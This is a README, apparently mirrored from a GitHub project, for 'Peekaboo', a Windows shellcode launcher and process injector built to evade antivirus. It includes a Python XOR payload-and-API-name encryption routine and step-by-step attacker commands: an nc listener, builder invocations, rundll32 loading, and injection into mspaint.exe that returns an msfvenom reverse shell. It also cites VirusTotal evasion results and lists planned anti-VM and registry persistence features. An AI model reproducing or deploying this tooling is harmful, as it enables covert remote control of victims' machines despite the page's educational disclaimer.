
Peekaboo

Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.

Main logic

XOR encryption and decryption of both the names of the Windows API functions the loader calls and the main payload (an msfvenom reverse shell is used as the example), so that neither the API strings nor the shellcode sits in plaintext in the compiled binary.
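The XOR scheme described above, as an added Python example (my illustration, not code from peekaboo.py): it encrypts a payload and the API names with a repeating key, emits them as C arrays the way a builder could paste them into the injector source, shows the decrypt side a loader would run, and demonstrates the known-plaintext weakness of repeating-key XOR. `SAMPLE_PAYLOAD` is a constructed stand-in, not shellcode, and `API_NAMES` is an assumed list of classic injection functions; the page does not say which functions peekaboo resolves or that its builder emits C this way.

```python
"""Added example (not peekaboo.py's own code): the XOR build/decrypt scheme.

XOR-encrypts a payload and the Win32 API names a loader would resolve at run
time, emits them as C arrays, shows the decrypt side, and demonstrates the
known-plaintext weakness of repeating-key XOR.
SAMPLE_PAYLOAD and API_NAMES are constructed stand-ins, not real shellcode.
"""
import os
from typing import List

# Constructed placeholder for an msfvenom reverse shell. NOT executable code;
# a real builder would read msfvenom's raw output here instead.
SAMPLE_PAYLOAD = bytes(range(0x20, 0x60)) + b"\x00" * 8

# Names a CreateRemoteThread-style injector resolves with GetProcAddress
# (assumed for illustration; the page does not list the functions it uses).
API_NAMES = ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory",
             "CreateRemoteThread"]


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key. Encrypt and decrypt are the same op."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xor_cstring(name: str, key: bytes) -> bytes:
    """Encrypt an API name including its NUL terminator, so the decrypted
    buffer is a C string ready for GetProcAddress and the plain name never
    appears in the binary."""
    return xor_bytes(name.encode("ascii") + b"\x00", key)


def decrypt_api_name(enc: bytes, key: bytes) -> str:
    """What the loader does at run time: decrypt, then stop at the NUL."""
    plain = xor_bytes(enc, key)
    return plain.split(b"\x00", 1)[0].decode("ascii")


def to_c_array(ident: str, data: bytes) -> str:
    """Render bytes as a C unsigned char array initializer."""
    body = ", ".join(f"0x{b:02x}" for b in data)
    return f"unsigned char {ident}[{len(data)}] = {{ {body} }};"


def build_c_source(payload: bytes, api_names: List[str], key: bytes) -> str:
    """Emit the fragment a builder pastes into the injector/DLL source: the
    key, the encrypted payload and one encrypted string per API name."""
    lines = [to_c_array("key", key),
             to_c_array("payload", xor_bytes(payload, key))]
    for name in api_names:
        lines.append(to_c_array("s_" + name, xor_cstring(name, key)))
    return "\n".join(lines) + "\n"


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_len: int) -> bytes:
    """Known-plaintext attack on repeating-key XOR. If an analyst can guess the
    first key_len payload bytes (a standard shellcode prologue, say), the key
    is just ciphertext XOR plaintext. XOR hides bytes from static signatures;
    it is not confidentiality."""
    if key_len > len(known_plaintext) or key_len > len(ciphertext):
        raise ValueError("need at least key_len bytes of known plaintext")
    return xor_bytes(ciphertext[:key_len], known_plaintext[:key_len])


if __name__ == "__main__":
    key = os.urandom(16)
    print(build_c_source(SAMPLE_PAYLOAD, API_NAMES, key))
    enc_payload = xor_bytes(SAMPLE_PAYLOAD, key)
    # Round trip, and the weakness: 16 known payload bytes give back the key.
    assert xor_bytes(enc_payload, key) == SAMPLE_PAYLOAD
    assert recover_key(enc_payload, SAMPLE_PAYLOAD[:16], 16) == key
    for name in API_NAMES:
        assert decrypt_api_name(xor_cstring(name, key), key) == name
```

The decrypt side is the same `xor_bytes` loop written in C inside the DLL or injector, run over each string just before `GetProcAddress` and over the payload just before it is written into the target. The `recover_key` function is the caveat a practitioner should keep in mind: this only defeats static string and byte signatures, and anything that scans memory after decryption, or knows the first few bytes of a stock msfvenom payload, sees straight through it.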

Usage

1. DLL

On the attacker machine:

Check your IP address:

ip a

Start a listener on the port you will pass as -p, for example with netcat:

nc -lvnp 4444

Run the builder with the listener address and port:

python3 peekaboo.py -l 192.168.56.1 -p 4444 --build 1

Then on the victim machine (Windows 10 x64), from PowerShell or a cmd prompt, load the DLL and call its exported function:

rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy

Back on the attacker machine, check the netcat listener for the incoming reverse shell.

2. Injector

On the attacker machine:

Check your IP address:

ip a

With a listener waiting on the port given to -p, run the builder on Linux, naming the target process for injection with -e (mspaint.exe in this example):

python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe --build 2

Then on the victim machine (Windows 10 x64) run:

.\peekaboo.exe

or double-click the executable if it was built with the -m windows parameter.

Back on the attacker machine, check the netcat listener for the incoming reverse shell.

3. NT API injector

On the attacker machine, with a listener waiting on the port given to -p, run the builder on Linux (again with mspaint.exe as the target process, here as a console build):

python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe -m console --build 3

Then on the victim machine (Windows 10 x64) run:

.\peekaboo.exe

and check the netcat listener on the attacker machine for the incoming reverse shell.

Issues

Tested on:

  1. Attacker machines: Kali Linux 2020.1, Windows 10 x64
  2. Victim machines: Windows 7 x64, Windows 10 x64
  3. Payload: Windows x64 reverse shell from msfvenom
  4. AV engines: Kaspersky, Windows Defender, Norton Antivirus Plus

VirusTotal results (detection counts are a snapshot at the date given; engines update, so re-check before relying on them):

2 September 2021:

https://www.virustotal.com/gui/file/c930b9aeab693d36c68e7bcf6353c7515b8fffc8f9a9233e49e90da49ab5d470/detection

30 December 2021 (NT API injector):

https://www.virustotal.com/gui/file/743f50e92c6ef48d6514e0ce2a255165f83afb1ae66deefd68dac50d80748e55/detection

antiscan.me result:

11 January 2022 (NT API injector):

https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9

TODO

  • Compile the injector on Kali Linux
  • XOR + AES (aes branch)
  • Call Windows API functions by name hash
  • Find the Kernel32 base address in assembly
  • One Python builder for all modes
  • Anti-VM tricks
  • Persistence via Windows Registry Run keys
  • Replace the msfvenom shell with a donut payload?

Attention

This tool is a Proof of Concept and is for Educational Purposes Only! The author takes no responsibility for any damage you cause.

License

MIT

Open Source Agenda is not affiliated with "Cocomelonc Peekaboo" Project. README Source: cocomelonc/peekaboo